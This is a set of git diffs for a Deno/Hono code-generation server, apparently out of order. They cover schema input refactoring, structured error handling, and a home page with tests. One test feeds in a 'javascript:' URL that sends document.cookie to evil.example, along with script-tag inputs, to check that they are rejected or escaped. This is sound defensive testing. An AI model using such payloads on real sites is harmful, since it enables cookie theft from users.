+  fetchSource,
+  resolveSchemaInput,
+  SchemaReadError,
+  SourceFetchError,
+} from "./schemaInput.ts";
+import type { ResolvedSchemaInput } from "./schemaInput.ts";
 import { homePageHtml, homePageMd } from "./homePage.ts";
 import type { HomePageContext, StackIdentity } from "./homePage.ts";
 
@@ -33,23 +39,52 @@ type GenerateResult = {
   generationMap?: GenerationMapEntry[];
 };
 
+/**
+ * Build the unified `SkmtcDocumentInput` from a resolved schema input. The
+ * host-side OAS normalization (Swagger 2 / 3.1 → 3.0 via `@skmtc/convert`)
+ * runs here; GQL passes its SDL through unchanged. A document that cannot be
+ * read at all surfaces as a `SchemaReadError` (→ structured 422), distinct
+ * from a readable document with issues (→ 200 + `manifest.parseIssues`).
+ */
+const toDocumentInput = async (
+  { protocol, schema }: ResolvedSchemaInput,
+): Promise<SkmtcDocumentInput> => {
+  switch (protocol) {
+    case "oas": {
+      try {
+        return {
+          type: "oas",
+          value: await toV3Document(stringToSchema(schema)),
+        };
+      } catch (error) {
+        const reason = error instanceof Error ? error.message : String(error);
+        throw new SchemaReadError(`Could not read OAS document: ${reason}`);
+      }
+    }
+    case "gql": {
+      return { type: "gql", value: schema };
+    }
+    default: {
+      const _exhaustive: never = protocol;
+      throw new Error(`Unhandled protocol: ${JSON.stringify(_exhaustive)}`);
+    }
+  }
+};
+
 type DispatchArgs = {
-  body: ArtifactsBody;
+  resolved: ResolvedSchemaInput;
+  schemaSrc: string | undefined;
+  clientSettings: v.InferOutput<typeof postArtifactsBody>["clientSettings"];
   toGeneratorConfigMap: <EnrichmentType = undefined>() =>
     GeneratorsMapContainer<EnrichmentType>;
   logsPath: string | undefined;
 };
 
-/**
- * Routes a parsed request body to the appropriate core entry point.
- *
- * The `body` parameter is already a discriminated union (validated by
- * `postArtifactsBody`), so switch-narrowing on `body.protocol`
- * automatically narrows the rest of the body's shape — there's
- * nothing to assert at runtime.
- */
+/** Routes a resolved schema input to the core `toArtifacts` entry point. */
 const dispatchArtifacts = async ({
-  body,
+  resolved,
+  schemaSrc,
+  clientSettings,
   toGeneratorConfigMap,
   logsPath,
 }: DispatchArgs): Promise<GenerateResult> => {
@@ -58,27 +93,7 @@ const dispatchArtifacts = async ({
   const spanId = `span-${startAt}`;
   const stackTrail = new StackTrail([traceId, spanId]);
 
-  // Build the unified SkmtcDocumentInput from the protocol-specific
-  // body shape, then route through the single `toArtifacts` entry. The
-  // host-side OAS normalization (Swagger 2 / 3.1 → 3.0 via
-  // `@skmtc/convert`) still runs here; GQL passes its SDL through
-  // unchanged.
-  let document: SkmtcDocumentInput;
-  switch (body.protocol) {
-    case "oas": {
-      const documentObject = await toV3Document(stringToSchema(body.schema));
-      document = { type: "oas", value: documentObject };
-      break;
-    }
-    case "gql": {
-      document = { type: "gql", value: body.schema };
-      break;
-    }
-    default: {
-      const _exhaustive: never = body;
-      throw new Error(`Unhandled protocol: ${JSON.stringify(_exhaustive)}`);
-    }
-  }
+  const document = await toDocumentInput(resolved);
 
   // Always emit attribution. The post-pass runs without a parser
   // (native parsers don't bundle cleanly via `deno bundle`), so AST
@@ -90,13 +105,16 @@ const dispatchArtifacts = async ({
     spanId,
     startAt,
     document,
-    settings: body.clientSettings,
+    settings: clientSettings,
     toGeneratorConfigMap,
     stackTrail,
     logsPath,
     silent: true,
     attribution: {
-      postPass: { schemaSrc: body.schemaSrc ?? body.protocol },
+      postPass: {
+        schemaSrc: schemaSrc ?? resolved.source?.resolvedUrl ??
+          resolved.protocol,
+      },
     },
   });
 
@@ -135,6 +153,43 @@ export const createServer = (
     }),
   );
 
+  // Structured errors, matching the published contract: a body that fails
+  // validation is a 400 with field-level issues; an unfetchable source or an
+  // unreadable document is a 422 with a reason; anything else is a JSON 500.
+  // Never the bare-text default — every failure tells the caller what to fix.
+  app.onError((error, c) => {
+    if (error instanceof v.ValiError) {
+      return c.json({
+        error: "invalid_request",
+        message: "Request body failed validation.",
+        issues: error.issues.map((issue) => ({
+          path: v.getDotPath(issue),
+          message: issue.message,
+        })),
+      }, 400);
+    }
+    if (error instanceof SyntaxError) {
+      return c.json({
+        error: "invalid_request",
+        message: "Request body is not valid JSON.",
+      }, 400);
+    }
+    if (error instanceof SourceFetchError) {
+      return c.json(
+        { error: "source_fetch_failed", message: error.message },
+        422,
+      );
+    }
+    if (error instanceof SchemaReadError) {
+      return c.json({ error: "invalid_schema", message: error.message }, 422);
+    }
+    console.error(error);
+    return c.json({
+      error: "internal_error",
+      message: error instanceof Error ? error.message : String(error),
+    }, 500);
+  });
+
   // The home page: HTML for browsers, the flat markdown contract for
   // everything else (curl sends `Accept: */*` — no flags needed).
   app.get("/", (c) => {
@@ -158,15 +213,24 @@ export const createServer = (
 
   app.post("/artifacts", async (c) => {
     const body = v.parse(postArtifactsBody, await c.req.json());
+    const resolved = await resolveSchemaInput(body);
 
     const { artifacts, manifest, sidecars, generationMap } =
       await dispatchArtifacts({
-        body,
+        resolved,
+        schemaSrc: body.schemaSrc,
+        clientSettings: body.clientSettings,
         toGeneratorConfigMap,
         logsPath,
       });
 
-    return c.json({ artifacts, manifest, sidecars, generationMap }, 200);
+    return c.json({
+      artifacts,
+      manifest,
+      sidecars,
+      generationMap,
+      ...(resolved.source !== undefined ? { source: resolved.source } : {}),
+    }, 200);
   });
 
   // Capability introspection: which subjects (operations / models) does each
@@ -175,30 +239,14 @@ export const createServer = (
   // `/artifacts` (the OAS branch is normalized v2/3.1 → 3.0 first).
   app.post("/subjects", async (c) => {
     const body = v.parse(postArtifactsBody, await c.req.json());
+    const resolved = await resolveSchemaInput(body);
 
     const startAt = Date.now();
     const traceId = `trace-${startAt}`;
     const spanId = `span-${startAt}`;
     const stackTrail = new StackTrail([traceId, spanId]);
 
-    let document: SkmtcDocumentInput;
-    switch (body.protocol) {
-      case "oas": {
-        document = {
-          type: "oas",
-          value: await toV3Document(stringToSchema(body.schema)),
-        };
-        break;
-      }
-      case "gql": {
-        document = { type: "gql", value: body.schema };
-        break;
-      }
-      default: {
-        const _exhaustive: never = body;
-        throw new Error(`Unhandled protocol: ${JSON.stringify(_exhaustive)}`);
-      }
-    }
+    const document = await toDocumentInput(resolved);
 
     const { subjects, parseIssues } = toSupportedSubjects({
       traceId,
@@ -223,30 +271,14 @@ export const createServer = (
   // `[id][refName]['main']` for models.
   app.post("/enrichment-defaults", async (c) => {
     const body = v.parse(postArtifactsBody, await c.req.json());
+    const resolved = await resolveSchemaInput(body);
 
     const startAt = Date.now();
     const traceId = `trace-${startAt}`;
     const spanId = `span-${startAt}`;
     const stackTrail = new StackTrail([traceId, spanId]);
 
-    let document: SkmtcDocumentInput;
-    switch (body.protocol) {
-      case "oas": {
-        document = {
-          type: "oas",
-          value: await toV3Document(stringToSchema(body.schema)),
-        };
-        break;
-      }
-      case "gql": {
-        document = { type: "gql", value: body.schema };
-        break;
-      }
-      default: {
-        const _exhaustive: never = body;
-        throw new Error(`Unhandled protocol: ${JSON.stringify(_exhaustive)}`);
-      }
-    }
+    const document = await toDocumentInput(resolved);
 
     const { enrichmentDefaults, parseIssues } = toEnrichmentDefaults({
       traceId,
@@ -295,12 +327,24 @@ export const createServer = (
   });
 
   app.post("/to-v3-json", async (c) => {
-    const { schema } = v.parse(toV3JsonBody, await c.req.json());
+    const body = v.parse(toV3JsonBody, await c.req.json());
+    const schema = body.source !== undefined
+      ? (await fetchSource(body.source)).schema
+      : body.schema;
+    if (schema === undefined) {
+      // Unreachable behind the request schema's exactly-one check.
+      throw new SchemaReadError("No schema input provided.");
+    }
 
     // 3.0/3.1 pass through unchanged; only Swagger 2.0 is converted to 3.0.
-    const normalizedDocument = await toV3Document(stringToSchema(schema));
-
-    return c.json({ schema: normalizedDocument });
+    try {
+      const normalizedDocument = await toV3Document(stringToSchema(schema));
+      return c.json({ schema: normalizedDocument });
+    } catch (error) {
+      if (error instanceof SchemaReadError) throw error;
+      const reason = error instanceof Error ? error.message : String(error);
+      throw new SchemaReadError(`Could not read OAS document: ${reason}`);
+    }
   });
 
   // Self-description: the server's own published OpenAPI 3.1 contract, covering

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -20,7 +20,7 @@ import {
   validateBody,
 } from "./requestSchemas.ts";
 import type { ArtifactsBody } from "./requestSchemas.ts";
-import { homePageHtml, homePageMd, resolveCoreVersion } from "./homePage.ts";
+import { homePageHtml, homePageMd } from "./homePage.ts";
 import type { HomePageContext, StackIdentity } from "./homePage.ts";
 
 type GenerateResult = {
@@ -122,7 +122,6 @@ export const createServer = (
     identity: identity ?? {},
     generators: Object.keys(toGeneratorConfigMap()),
     origin: new URL(requestUrl).origin,
-    coreVersion: resolveCoreVersion(),
   });
 
   app.use(

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -15,10 +15,12 @@ import * as v from "valibot";
 import { StackTrail } from "@skmtc/core";
 import openApiDocument from "../openapi.json" with { type: "json" };
 import {
+  InvalidBodyError,
   postArtifactsBody,
   toV3JsonBody,
   validateBody,
 } from "./requestSchemas.ts";
+import type { Context } from "hono";
 import {
   fetchSource,
   resolveSchemaInput,
@@ -28,6 +30,17 @@ import {
 import type { ResolvedSchemaInput } from "./schemaInput.ts";
 import { homePageHtml, homePageMd } from "./homePage.ts";
 import type { HomePageContext, StackIdentity } from "./homePage.ts";
+
+/** Read a request body as JSON, reporting a malformed body as the typed
+ *  `InvalidBodyError` (→ 400). Only the body parse is caught, so a
+ *  `SyntaxError` raised anywhere below a route keeps its own meaning. */
+const readJsonBody = async (c: Context): Promise<unknown> => {
+  try {
+    return await c.req.json();
+  } catch {
+    throw new InvalidBodyError("Request body is not valid JSON.");
+  }
+};
 
 type GenerateResult = {
   artifacts: Record<string, string>;
@@ -168,11 +181,8 @@ export const createServer = (
         })),
       }, 400);
     }
-    if (error instanceof SyntaxError) {
-      return c.json({
-        error: "invalid_request",
-        message: "Request body is not valid JSON.",
-      }, 400);
+    if (error instanceof InvalidBodyError) {
+      return c.json({ error: "invalid_request", message: error.message }, 400);
     }
     if (error instanceof SourceFetchError) {
       return c.json(
@@ -212,7 +222,7 @@ export const createServer = (
   app.get("/llms.txt", (c) => c.text(homePageMd(toHomeContext(c.req.url))));
 
   app.post("/artifacts", async (c) => {
-    const body = v.parse(postArtifactsBody, await c.req.json());
+    const body = v.parse(postArtifactsBody, await readJsonBody(c));
     const resolved = await resolveSchemaInput(body);
 
     const { artifacts, manifest, sidecars, generationMap } =
@@ -238,7 +248,7 @@ export const createServer = (
   // `isSupported` only — no transform, no render. Same request body as
   // `/artifacts` (the OAS branch is normalized v2/3.1 → 3.0 first).
   app.post("/subjects", async (c) => {
-    const body = v.parse(postArtifactsBody, await c.req.json());
+    const body = v.parse(postArtifactsBody, await readJsonBody(c));
     const resolved = await resolveSchemaInput(body);
 
     const startAt = Date.now();
@@ -270,7 +280,7 @@ export const createServer = (
   // (subject scope only), keyed `[id][path][method]['main']` for operations and
   // `[id][refName]['main']` for models.
   app.post("/enrichment-defaults", async (c) => {
-    const body = v.parse(postArtifactsBody, await c.req.json());
+    const body = v.parse(postArtifactsBody, await readJsonBody(c));
     const resolved = await resolveSchemaInput(body);
 
     const startAt = Date.now();
@@ -316,7 +326,7 @@ export const createServer = (
   // posted enrichments). The host calls this to gate persists, CLI pushes,
   // schema-drift migration, and Publish.
   app.post("/validate", async (c) => {
-    const { clientSettings } = v.parse(validateBody, await c.req.json());
+    const { clientSettings } = v.parse(validateBody, await readJsonBody(c));
 
     const issues = validateConfig(
       clientSettings?.enrichments,
@@ -327,7 +337,7 @@ export const createServer = (
   });
 
   app.post("/to-v3-json", async (c) => {
-    const body = v.parse(toV3JsonBody, await c.req.json());
+    const body = v.parse(toV3JsonBody, await readJsonBody(c));
     const schema = body.source !== undefined
       ? (await fetchSource(body.source)).schema
       : body.schema;

--- a/deno/server/src/createServer.ts
+++ b/deno/server/src/createServer.ts
@@ -20,6 +20,8 @@ import {
   validateBody,
 } from "./requestSchemas.ts";
 import type { ArtifactsBody } from "./requestSchemas.ts";
+import { homePageHtml, homePageMd, resolveCoreVersion } from "./homePage.ts";
+import type { HomePageContext, StackIdentity } from "./homePage.ts";
 
 type GenerateResult = {
   artifacts: Record<string, string>;
@@ -105,12 +107,23 @@ type CreateServerArgs = {
   toGeneratorConfigMap: <EnrichmentType = undefined>() =>
     GeneratorsMapContainer<EnrichmentType>;
   logsPath?: string;
+  /** Deploy-time identity shown on the home page (`/`, `/index.md`,
+   *  `/llms.txt`). Optional — without it the page falls back to a generic
+   *  self-description. */
+  identity?: StackIdentity;
 };
 
 export const createServer = (
-  { toGeneratorConfigMap, logsPath }: CreateServerArgs,
+  { toGeneratorConfigMap, logsPath, identity }: CreateServerArgs,
 ): Hono => {
   const app = new Hono();
+
+  const toHomeContext = (requestUrl: string): HomePageContext => ({
+    identity: identity ?? {},
+    generators: Object.keys(toGeneratorConfigMap()),
+    origin: new URL(requestUrl).origin,
+    coreVersion: resolveCoreVersion(),
+  });
 
   app.use(
     "*",
@@ -122,6 +135,27 @@ export const createServer = (
       exposeHeaders: ["api-version", "authorization", "content-type"],
     }),
   );
+
+  // The home page: HTML for browsers, the flat markdown contract for
+  // everything else (curl sends `Accept: */*` — no flags needed).
+  app.get("/", (c) => {
+    const wantsHtml = (c.req.header("accept") ?? "").includes("text/html");
+    return wantsHtml
+      ? c.html(homePageHtml(toHomeContext(c.req.url)))
+      : c.text(homePageMd(toHomeContext(c.req.url)), 200, {
+        "content-type": "text/markdown; charset=utf-8",
+      });
+  });
+
+  app.get(
+    "/index.md",
+    (c) =>
+      c.text(homePageMd(toHomeContext(c.req.url)), 200, {
+        "content-type": "text/markdown; charset=utf-8",
+      }),
+  );
+
+  app.get("/llms.txt", (c) => c.text(homePageMd(toHomeContext(c.req.url))));
 
   app.post("/artifacts", async (c) => {
     const body = v.parse(postArtifactsBody, await c.req.json());

--- a/deno/server/src/homePage.test.ts
+++ b/deno/server/src/homePage.test.ts
@@ -1,0 +1,79 @@
+import { assertEquals, assertStringIncludes } from "@std/assert";
+import { homePageHtml, homePageMd, toStackIdentity } from "./homePage.ts";
+
+const toContext = (denoConfig: unknown) => ({
+  identity: toStackIdentity(denoConfig),
+  generators: ["@skmtc/gen-zod"],
+  origin: "https://stack.example",
+});
+
+Deno.test("toStackIdentity - reads the label, version and derived hub link", () => {
+  assertEquals(
+    toStackIdentity({
+      name: "@skmtc/markdown-docs",
+      version: "1.2.3",
+      description: "Docs from a schema.",
+    }),
+    {
+      name: "skmtc/markdown-docs",
+      version: "1.2.3",
+      description: "Docs from a schema.",
+      homepageUrl: "https://skmtc.dev/skmtc/markdown-docs",
+    },
+  );
+});
+
+Deno.test("toStackIdentity - keeps an http(s) homepage", () => {
+  const identity = toStackIdentity({
+    name: "@skmtc/markdown-docs",
+    homepage: "https://docs.example/stack",
+  });
+  assertEquals(identity.homepageUrl, "https://docs.example/stack");
+});
+
+Deno.test("toStackIdentity - drops a homepage that is not http(s)", () => {
+  // The value comes from a third party's `deno.json` and lands in `href`
+  // attributes, where a `javascript:` URL would run on the deployment's
+  // own origin. Escaping alone does not neutralize the scheme.
+  const identity = toStackIdentity({
+    name: "@evil/stack",
+    homepage: "javascript:fetch('https://evil.example/'+document.cookie)",
+  });
+  assertEquals(identity.homepageUrl, "https://skmtc.dev/evil/stack");
+});
+
+Deno.test("homePageHtml - a rejected homepage never reaches an href", () => {
+  const html = homePageHtml(toContext({
+    name: "@evil/stack",
+    homepage: "javascript:alert(1)",
+  }));
+  assertEquals(html.includes("javascript:"), false);
+});
+
+Deno.test("homePageHtml - escapes identity text into the page", () => {
+  const html = homePageHtml(toContext({
+    name: "@evil/stack",
+    description: '<script>alert("x")</script>',
+  }));
+  assertEquals(html.includes("<script>alert"), false);
+  assertStringIncludes(html, "&lt;script&gt;alert(&quot;x&quot;)");
+});
+
+Deno.test("toStackIdentity - an unreadable config yields the generic page", () => {
+  assertEquals(toStackIdentity("not a config"), {});
+  assertStringIncludes(
+    homePageMd(toContext("not a config")),
+    "# skmtc stack server",
+  );
+});
+
+Deno.test("homePageMd - names the stack, its generators and the endpoints", () => {
+  const markdown = homePageMd(toContext({
+    name: "@skmtc/markdown-docs",
+    version: "1.2.3",
+  }));
+  assertStringIncludes(markdown, "# skmtc/markdown-docs v1.2.3");
+  assertStringIncludes(markdown, "- @skmtc/gen-zod");
+  assertStringIncludes(markdown, "`POST /artifacts`");
+  assertStringIncludes(markdown, "https://stack.example/artifacts");
+});

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -79,17 +79,13 @@ export const toStackIdentity = (denoConfig: unknown): StackIdentity => {
 };
 
 /** The zero-asset first command: a public schema URL, nothing to have on
- *  disk, no stringify step. */
+ *  disk, no stringify step. The page shows ONLY this — the inline `schema`
+ *  field stays documented in the agent prompt and the OpenAPI contract,
+ *  and local files are the CLI's job (`source` in client.json). */
 const curlExample = (origin: string): string =>
   `curl -s -X POST ${origin}/artifacts \\
   -H 'content-type: application/json' \\
   -d '{"source":"https://petstore3.swagger.io/api/v3/openapi.json"}'`;
-
-/** The local-file variant: inline the document as a JSON string. */
-const curlFileExample = (origin: string): string =>
-  `curl -s -X POST ${origin}/artifacts \\
-  -H 'content-type: application/json' \\
-  -d "{\\"schema\\":$(jq -Rs . < openapi.json)}"`;
 
 const installCommand = ({ name }: StackIdentity): string =>
   name
@@ -165,12 +161,6 @@ Point \`source\` at any schema URL:
 
 \`\`\`sh
 ${curlExample(origin)}
-\`\`\`
-
-Or inline a local file as \`schema\`:
-
-\`\`\`sh
-${curlFileExample(origin)}
 \`\`\`
 
 Returns \`{"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}\` —
@@ -334,13 +324,6 @@ export const homePageHtml = (context: HomePageContext): string => {
       <button class="copy" data-copy="curl-cmd">[copy]</button>
       <pre><code id="curl-cmd"><span class="p">$</span> ${
     escapeHtml(curlExample(origin))
-  }</code></pre>
-    </div>
-    <p class="dim">Or inline a local file as <code>schema</code>:</p>
-    <div class="block">
-      <button class="copy" data-copy="curl-file-cmd">[copy]</button>
-      <pre><code id="curl-file-cmd"><span class="p">$</span> ${
-    escapeHtml(curlFileExample(origin))
   }</code></pre>
     </div>
     <p>Returns <code>{"artifacts": {"&lt;path&gt;": "&lt;content&gt;", …},

--- a/deno/server/src/homePage.ts
+++ b/deno/server/src/homePage.ts
@@ -1,0 +1,364 @@
+// The stack server's home page — HTML for browsers, markdown for curl and
+// agents. Served by `createServer` at `/` (content-negotiated on `Accept`),
+// `/index.md` and `/llms.txt`, so any deployment of the Hono app — local
+// `skmtc serve`, a standalone deploy, or a hosted stack app — describes
+// itself without a separate catalog round-trip.
+//
+// Information architecture: `/` carries orientation and the first successful
+// command only; everything deeper lives one level down at a canonical URL
+// (`/llms.txt` → `/openapi.json` → the hub page). The HTML layers with
+// <details> disclosure; the markdown variant is flat and complete because
+// agents want the whole contract inline.
+
+/** Deploy-time identity shown on the home page. All fields optional — a
+ *  server created without one still serves a useful, generic page. */
+export type StackIdentity = {
+  /** `{account}/{slug}` label, e.g. `skmtc/markdown-docs`. */
+  name?: string;
+  /** Published semver. */
+  version?: string;
+  /** One-line description of what the stack produces. */
+  description?: string;
+  /** The stack's hub page. */
+  homepageUrl?: string;
+};
+
+/** Per-request context the page is rendered from. */
+export type HomePageContext = {
+  identity: StackIdentity;
+  /** Generator ids composed into this server. */
+  generators: string[];
+  /** The serving origin, from the request URL. */
+  origin: string;
+  /** Resolved `@skmtc/core` version. */
+  coreVersion: string;
+};
+
+const FALLBACK_NAME = "skmtc stack server";
+const FALLBACK_DESCRIPTION = "Convert an OpenAPI v3 schema into source files.";
+const FALLBACK_HOMEPAGE = "https://skmtc.dev";
+
+/** Resolved `@skmtc/core` version — the same skew canary trick the hosted
+ *  wrapper uses. Resolution shapes seen live:
+ *  `https://jsr.io/@skmtc/core/0.26.0/mod.ts` and `jsr:@skmtc/core@0.26.0`. */
+export const resolveCoreVersion = (): string => {
+  try {
+    const resolved = import.meta.resolve("@skmtc/core");
+    const match = /@skmtc\/core[@/]([^/]+)/.exec(resolved);
+    return match ? match[1] : resolved;
+  } catch {
+    return "unresolved";
+  }
+};
+
+const curlExample = (origin: string): string =>
+  `curl -s -X POST ${origin}/artifacts \\
+  -H 'content-type: application/json' \\
+  -d "{\\"protocol\\":\\"oas\\",\\"schema\\":$(jq -Rs . < openapi.json)}"`;
+
+const installCommand = ({ name }: StackIdentity): string =>
+  name
+    ? `skmtc init && skmtc install @${name}`
+    : "skmtc init && skmtc install @<account>/<stack>";
+
+const agentPrompt = ({ identity, origin }: HomePageContext): string =>
+  `Generate code using the SKMTC stack server at ${origin}${
+    identity.name ? ` (${identity.name})` : ""
+  }.
+${identity.description || FALLBACK_DESCRIPTION}
+It is deterministic: the same schema always produces the same output.
+
+1. POST ${origin}/artifacts with JSON body:
+   {"protocol": "oas", "schema": "<OpenAPI v3 document, JSON-stringified>"}
+   (use "gql" with an SDL string for GraphQL)
+2. Response: {"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}.
+   Write every artifacts entry to disk at its path.
+3. The server fails open: bad schemas return 200 with issues in
+   manifest.parseIssues. Treat level "error" entries as failures; do not
+   retry - fix the schema instead.
+4. GET ${origin}/llms.txt describes this server; GET ${origin}/openapi.json
+   is its full API contract.`;
+
+const ENDPOINT_LINES: ReadonlyArray<[string, string]> = [
+  ["POST /artifacts", "generate all files from a schema"],
+  ["POST /subjects", "preview which operations/models would generate"],
+  ["POST /descriptors", "enrichment configuration schema"],
+  ["POST /validate", "check an enrichment config"],
+  ["POST /enrichment-defaults", "schema-derived enrichment defaults"],
+  ["POST /to-v3-json", "normalize Swagger 2 / OAS 3.1 to OAS 3.0"],
+  ["GET /generators", "generator ids in this stack"],
+  ["GET /openapi.json", "this server's own API contract"],
+];
+
+const escapeHtml = (text: string): string =>
+  text
+    .replaceAll("&", "&amp;")
+    .replaceAll("<", "&lt;")
+    .replaceAll(">", "&gt;")
+    .replaceAll('"', "&quot;");
+
+/** The flat, complete markdown page — served at `/` (non-browser Accept),
+ *  `/index.md` and `/llms.txt`. */
+export const homePageMd = (context: HomePageContext): string => {
+  const { identity, generators, origin, coreVersion } = context;
+  const name = identity.name ?? FALLBACK_NAME;
+  const homepage = identity.homepageUrl ?? FALLBACK_HOMEPAGE;
+  const endpoints = ENDPOINT_LINES.map(([route, what]) =>
+    `- \`${route}\` — ${what}`
+  ).join("\n");
+  const generatorList = generators.length > 0
+    ? generators.map((id) => `- ${id}`).join("\n")
+    : "- (none configured)";
+  return `# ${name}${identity.version ? ` v${identity.version}` : ""}
+
+${identity.description || FALLBACK_DESCRIPTION}
+
+A deployed SKMTC stack server: POST a schema, receive generated source files.
+Deterministic — same schema in, same bytes out. Nothing is stored.
+
+## Use
+
+\`\`\`sh
+${curlExample(origin)}
+\`\`\`
+
+Returns \`{"artifacts": {"<path>": "<content>", ...}, "manifest": {...}}\` —
+write each artifacts entry to its path.
+
+Bad schemas do not error: the response is 200 with issues in
+\`manifest.parseIssues\`. Treat \`level: "error"\` entries as failures; do not
+retry — runs are deterministic, so fix the schema instead.
+
+## When to use it
+
+- You have a schema and want its derived code without writing it
+- CI: regenerate on every schema change, diff like source
+- Agents: delegate bulk file generation to a single HTTP call
+
+## Customize
+
+The output is a template you own, not a black box. Install the stack locally
+and edit the generator source — file paths, templates and structure are the
+customization surface.
+
+\`\`\`sh
+${installCommand(identity)}
+\`\`\`
+
+More at ${homepage}
+
+## Generators
+
+${generatorList}
+
+## Endpoints
+
+${endpoints}
+
+## Prompt for your agent
+
+\`\`\`
+${agentPrompt(context)}
+\`\`\`
+
+---
+core ${coreVersion} · ${homepage}
+`;
+};
+
+/** The layered HTML page — served at `/` to browsers (`Accept: text/html`). */
+export const homePageHtml = (context: HomePageContext): string => {
+  const { identity, generators, origin, coreVersion } = context;
+  const name = escapeHtml(identity.name ?? FALLBACK_NAME);
+  const homepage = escapeHtml(identity.homepageUrl ?? FALLBACK_HOMEPAGE);
+  const tagline = escapeHtml(identity.description || FALLBACK_DESCRIPTION);
+  const endpointRows = ENDPOINT_LINES.map(
+    ([route, what]) =>
+      `<tr><td><code>${escapeHtml(route)}</code></td><td>${
+        escapeHtml(what)
+      }</td></tr>`,
+  ).join("\n        ");
+  const generatorItems = generators.length > 0
+    ? generators.map((id) => `<li>${escapeHtml(id)}</li>`).join("\n        ")
+    : "<li>(none configured)</li>";
+  return `<!doctype html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>${name} — stack server</title>
+<style>
+  :root {
+    --bg: #0c0e0b; --surface: #12150f; --border: #262b21;
+    --text: #ccd4c4; --dim: #79826f; --accent: #9fd077; --amber: #d8a657;
+    color-scheme: dark;
+  }
+  @media (prefers-color-scheme: light) {
+    :root {
+      --bg: #f7f5ef; --surface: #efece3; --border: #d9d5c6;
+      --text: #2c3128; --dim: #6f7566; --accent: #46732f; --amber: #96650f;
+      color-scheme: light;
+    }
+  }
+  * { margin: 0; padding: 0; box-sizing: border-box; }
+  body {
+    background: var(--bg); color: var(--text);
+    font-family: ui-monospace, "SF Mono", "Cascadia Mono", Menlo, Consolas, monospace;
+    font-size: 13.5px; line-height: 1.55; padding: 1.5rem 1.1rem 2.5rem;
+  }
+  main { max-width: 41rem; margin: 0 auto; display: flex; flex-direction: column; gap: 1.4rem; }
+  a { color: var(--accent); text-decoration: none; }
+  a:hover, a:focus-visible { text-decoration: underline; }
+  a:focus-visible, button:focus-visible, summary:focus-visible { outline: 1px solid var(--accent); outline-offset: 2px; }
+  header { display: flex; flex-direction: column; gap: 0.3rem; }
+  .name { font-size: 17px; font-weight: 700; }
+  .name .ver { color: var(--dim); font-weight: 400; font-size: 13.5px; margin-left: 0.5em; }
+  nav { color: var(--dim); margin-top: 0.2rem; }
+  nav a { margin-right: 0.9em; }
+  h2 { font-size: 13.5px; font-weight: 700; color: var(--accent); margin-bottom: 0.45rem; }
+  h2::before { content: "## "; color: var(--dim); font-weight: 400; }
+  .dim { color: var(--dim); }
+  p { margin-bottom: 0.4rem; }
+  p:last-child { margin-bottom: 0; }
+  ul { list-style: none; display: flex; flex-direction: column; gap: 0.25rem; }
+  li { padding-left: 1.1em; text-indent: -1.1em; }
+  li::before { content: "- "; color: var(--dim); }
+  .block { position: relative; background: var(--surface); border: 1px solid var(--border);
+           border-radius: 4px; padding: 0.75rem 0.9rem; margin: 0.55rem 0 0.45rem;
+           transition: border-color 0.15s; }
+  .block.flash { border-color: var(--accent); }
+  .block pre { overflow-x: auto; }
+  .block code { white-space: pre; }
+  .p { color: var(--amber); user-select: none; }
+  .copy { position: absolute; top: 0.45rem; right: 0.55rem; background: none; border: none;
+          cursor: pointer; padding: 0.1rem 0.35rem; border-radius: 3px; font: inherit;
+          font-size: 12px; color: var(--dim); transition: color 0.15s, background 0.15s; }
+  .copy:hover { color: var(--accent); }
+  .copy.done { color: var(--bg); background: var(--accent); }
+  details { border-top: 1px solid var(--border); padding: 0.55rem 0; }
+  details:last-of-type { border-bottom: 1px solid var(--border); }
+  summary { cursor: pointer; list-style: none; color: var(--text); display: flex;
+            align-items: baseline; gap: 0.5em; }
+  summary::-webkit-details-marker { display: none; }
+  summary::before { content: "+"; color: var(--accent); width: 1em; }
+  details[open] summary::before { content: "-"; }
+  summary .copy { position: static; margin-left: auto; }
+  summary .hint { margin-left: auto; }
+  details > :not(summary) { margin-top: 0.5rem; margin-left: 1.5em; }
+  table { border-collapse: collapse; }
+  td { padding: 0.1rem 0; vertical-align: baseline; }
+  td:first-child { padding-right: 1.2em; white-space: nowrap; }
+  td:last-child { color: var(--dim); }
+  .tablewrap { overflow-x: auto; }
+  footer { color: var(--dim); font-size: 12.5px; display: flex; flex-wrap: wrap;
+           column-gap: 0.9em; row-gap: 0.2em; }
+  footer a { color: var(--dim); }
+  footer a:hover { color: var(--accent); }
+</style>
+</head>
+<body>
+<main>
+  <header>
+    <div class="name">${name}${
+    identity.version
+      ? `<span class="ver">v${escapeHtml(identity.version)}</span>`
+      : ""
+  }</div>
+    <div>${tagline}</div>
+    <div class="dim">Deterministic — same schema in, same bytes out. Nothing is stored.</div>
+    <nav aria-label="formats">
+      <a href="/index.md">.md</a>
+      <a href="/openapi.json">openapi.json</a>
+      <a href="${homepage}">hub &#8599;</a>
+    </nav>
+  </header>
+
+  <section>
+    <h2>use</h2>
+    <div class="block">
+      <button class="copy" data-copy="curl-cmd">[copy]</button>
+      <pre><code id="curl-cmd"><span class="p">$</span> ${
+    escapeHtml(curlExample(origin))
+  }</code></pre>
+    </div>
+    <p>Returns <code>{"artifacts": {"&lt;path&gt;": "&lt;content&gt;", …},
+    "manifest": {…}}</code> — write each entry to its path.</p>
+    <p class="dim">Bad schemas don't error; they log. Check
+    <code>manifest.parseIssues</code> before trusting partial output.</p>
+  </section>
+
+  <div>
+    <details>
+      <summary>when to use it</summary>
+      <ul>
+        <li>You have a schema and want its derived code without writing it</li>
+        <li>CI: regenerate on every schema change, diff like source</li>
+        <li>Agents: delegate bulk file generation to a single HTTP call</li>
+      </ul>
+    </details>
+    <details>
+      <summary>customize</summary>
+      <p>The output is a template you own, not a black box. Install the stack
+      locally and edit the generator source — file paths, templates and
+      structure are the customization surface.</p>
+      <div class="block">
+        <button class="copy" data-copy="install-cmd">[copy]</button>
+        <pre><code id="install-cmd"><span class="p">$</span> ${
+    escapeHtml(installCommand(identity))
+  }</code></pre>
+      </div>
+      <p class="dim">Docs and versions: <a href="${homepage}">hub &#8599;</a></p>
+    </details>
+    <details>
+      <summary>prompt for your agent
+        <button class="copy" data-copy="agent-prompt">[copy]</button>
+      </summary>
